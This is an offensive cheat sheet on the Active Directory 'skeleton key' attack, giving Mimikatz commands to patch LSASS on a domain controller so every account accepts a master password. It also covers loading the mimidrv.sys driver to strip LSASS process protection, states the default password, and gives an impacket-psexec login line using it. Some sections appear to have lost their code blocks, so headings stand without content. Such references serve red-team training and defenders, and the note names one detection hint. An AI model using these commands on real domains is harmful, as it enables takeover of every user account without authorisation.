Overview
Patch LSASS on DC with master password. All users can authenticate with their real password OR the skeleton key. Does not survive DC reboot.Mimikatz (On DC)
mimikatz
Authenticate with Skeleton Key
Remote Injection (Needs DA)
If you have code exec on DC:Notes
- Patches LSASS memory on DC — not persistent across reboots
- All domain users affected
- Original passwords still work
- Default skeleton password:
mimikatz - LSASS must not be running as Protected Process (PPL)
- Detection: monitor LSASS memory modifications
If LSASS is Protected (PPL)
misc::skeleton has no /driver switch. To bypass PPL, load the mimikatz driver (!+) and strip protection from LSASS first, then inject:
!+ loads the mimidrv.sys kernel driver; !processprotect ... /remove removes the PPL flag from LSASS.
Quick Reference
| Task | Command |
|---|---|
| Inject | misc::skeleton (on DC) |
| Default password | mimikatz |
| Login | impacket-psexec DOMAIN/anyuser:mimikatz@DC |
| Survives reboot | No |